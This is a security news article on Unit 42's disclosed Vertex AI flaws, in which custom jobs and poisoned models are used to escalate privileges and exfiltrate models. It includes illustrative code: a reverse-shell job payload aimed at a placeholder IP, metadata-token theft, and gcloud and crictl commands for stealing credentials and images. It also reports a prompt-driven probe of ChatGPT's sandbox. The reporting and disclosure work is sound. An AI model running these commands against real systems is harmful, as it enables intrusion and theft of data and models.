The Cyber Security News

Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform

November 15, 2024

Cybersecurity researchers have disclosed two security flaws in Google’s Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud.

“By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project,” Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week.

“Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk.”



Vertex AI is Google’s ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021.


Central to exploiting the privilege escalation flaw is a feature called Vertex AI Pipelines, which lets users automate and monitor MLOps workflows to train and tune ML models using custom jobs.

Unit 42’s research found that by manipulating the custom job pipeline, it’s possible to escalate privileges and gain access to otherwise restricted resources. This is accomplished by creating a custom job that runs a specially crafted image designed to launch a reverse shell, granting backdoor access to the environment.
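For illustration, a malicious custom job of this kind could be expressed with a payload along these lines, modeled on the public Vertex AI CustomJob REST schema. The image name, IP address, and port are hypothetical placeholders, not details from the Unit 42 report, and no API call is made here:

```python
# Hypothetical sketch of a Vertex AI CustomJob payload whose worker
# container is an attacker-controlled image. All identifiers below are
# illustrative assumptions.
malicious_job = {
    "displayName": "innocuous-training-job",
    "jobSpec": {
        "workerPoolSpecs": [
            {
                "machineSpec": {"machineType": "n1-standard-4"},
                "replicaCount": 1,
                "containerSpec": {
                    # Image that opens a reverse shell when it starts.
                    "imageUri": "docker.io/attacker/revshell:latest",
                    "command": ["/bin/sh", "-c"],
                    "args": ["sh -i >& /dev/tcp/203.0.113.5/4444 0>&1"],
                },
            }
        ]
    },
}

# The job runs under the tenant project's service agent identity,
# which is what makes the escalation possible.
print(malicious_job["jobSpec"]["workerPoolSpecs"][0]["containerSpec"]["imageUri"])
```

The key point is that the attacker controls only the container spec; the elevated permissions come from the identity the platform attaches to the job, not from anything in the payload itself.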

The custom job, per the security vendor, runs in a tenant project with a service agent account that has extensive permissions to list all service accounts, manage storage buckets, and access BigQuery tables, which could then be abused to access internal Google Cloud repositories and download images.

The second vulnerability involves deploying a poisoned model in a tenant project so that it creates a reverse shell when deployed to an endpoint. The shell then abuses the read-only permissions of the “custom-online-prediction” service account to enumerate Kubernetes clusters and fetch their credentials in order to run arbitrary kubectl commands.
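The enumeration path described above can be sketched roughly as follows, under the assumption that the attacker is working from the reverse shell inside the prediction container; the cluster name is a placeholder and this is not the researchers’ actual tooling:

```python
# Illustrative sketch of the GCP-to-Kubernetes pivot available to the
# read-only "custom-online-prediction" service account. Each entry is a
# command an attacker might run from the reverse shell.
enumeration_steps = [
    # The container's metadata server hands out the service account token.
    ["curl", "-H", "Metadata-Flavor: Google",
     "http://metadata.google.internal/computeMetadata/v1/instance/"
     "service-accounts/default/token"],
    # List GKE clusters visible to that identity (GCP side).
    ["gcloud", "container", "clusters", "list", "--format=json"],
    # Fetch kubeconfig credentials for a discovered cluster.
    ["gcloud", "container", "clusters", "get-credentials", "<cluster-name>"],
    # With credentials in place, read-only kubectl commands succeed.
    ["kubectl", "get", "pods", "--all-namespaces"],
]

for step in enumeration_steps:
    print(" ".join(step))
```

The pivot works because, as the researchers note, GCP IAM permissions and GKE cluster access are linked through Workload Identity Federation, so a token valid on one side grants footing on the other.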

“This step enabled us to move from the GCP realm into Kubernetes,” the researchers said. “This lateral movement was possible because permissions between GCP and GKE were linked through IAM Workload Identity Federation.”

The analysis further found that this access can be used to view the newly created image within the Kubernetes cluster and obtain its image digest, which uniquely identifies a container image. The digest can then be used to pull the image outside of the container with crictl, using the authentication token associated with the “custom-online-prediction” service account.
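A rough sketch of that extraction step, with placeholder digest and registry values (the exact crictl invocation used by the researchers is not published in this article):

```python
# Hedged sketch of the image-extraction step: using crictl with the
# service account's OAuth access token to pull an image by digest out
# of the node's container runtime. All values are placeholders.
access_token = "<custom-online-prediction-token>"
image_digest = "sha256:<digest-of-newly-created-image>"
registry = "us-docker.pkg.dev/<tenant-project>/<repo>/<image>"

commands = [
    # Enumerate images known to the runtime and note their digests.
    "crictl images --digests",
    # Authenticate to the registry as the service account and pull the
    # image so it can be exported outside the cluster.
    f"crictl pull --creds oauth2accesstoken:{access_token} {registry}@{image_digest}",
]

for c in commands:
    print(c)
```

`oauth2accesstoken` is the conventional username for token-based authentication against Google container registries; the point is that a read-only token suffices to walk images out of the cluster once their digests are known.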

On top of that, the malicious model could also be weaponized to view and export all large language models (LLMs) and their fine-tuned adapters in a similar fashion.

This could have severe consequences when a developer unknowingly deploys a trojanized model uploaded to a public repository, allowing the threat actor to exfiltrate every ML model and fine-tuned LLM in the project. Following responsible disclosure, both shortcomings have been addressed by Google.

“This research highlights how a single malicious model deployment could compromise an entire AI environment,” the researchers said. “An attacker could use even one unverified model deployed on a production system to exfiltrate sensitive data, leading to severe model exfiltration attacks.”

Organizations are advised to implement strict controls on model deployments and to audit the permissions required to deploy a model in tenant projects.
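One way to start such an audit is a small script over the project’s IAM policy (as returned by `gcloud projects get-iam-policy --format=json`); the “overly broad” role set below is an illustrative assumption, not Google guidance:

```python
# Minimal audit sketch: flag service accounts holding roles broad
# enough to enable this kind of escalation. The role list is an
# illustrative assumption.
OVERLY_BROAD = {"roles/owner", "roles/editor", "roles/iam.serviceAccountAdmin"}

def flag_risky_bindings(policy: dict) -> list[tuple[str, str]]:
    """Return (member, role) pairs where a service account has a broad role."""
    risky = []
    for binding in policy.get("bindings", []):
        if binding["role"] in OVERLY_BROAD:
            for member in binding["members"]:
                if member.startswith("serviceAccount:"):
                    risky.append((member, binding["role"]))
    return risky

# Example policy with one risky binding and one benign one.
sample_policy = {
    "bindings": [
        {"role": "roles/editor",
         "members": ["serviceAccount:custom-job@proj.iam.gserviceaccount.com"]},
        {"role": "roles/viewer",
         "members": ["user:dev@example.com"]},
    ]
}
print(flag_risky_bindings(sample_policy))
# → [('serviceAccount:custom-job@proj.iam.gserviceaccount.com', 'roles/editor')]
```

In practice the check would run against every tenant project that accepts model deployments, and the flagged bindings would be reviewed against least-privilege requirements.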


The development comes as Mozilla’s 0Day Investigative Network (0Din) revealed that it’s possible to interact with OpenAI ChatGPT’s underlying sandbox environment (“/home/sandbox/.openai_internal/”) via prompts, granting the ability to upload and execute Python scripts, move files, and even download the LLM’s playbook.

That said, it’s worth noting that OpenAI considers such interactions as intentional or expected behavior, given that the code execution takes place within the confines of the sandbox and is unlikely to spill out.

“For anyone eager to explore OpenAI’s ChatGPT sandbox, it’s crucial to understand that most activities within this containerized environment are intended features rather than security gaps,” security researcher Marco Figueroa said.

“Extracting knowledge, uploading files, running bash commands or executing Python code within the sandbox are all fair game, as long as they don’t cross the invisible lines of the container.”



Some parts of this article are sourced from:
thehackernews.com


Copyright © TheCyberSecurity.News, All Rights Reserved.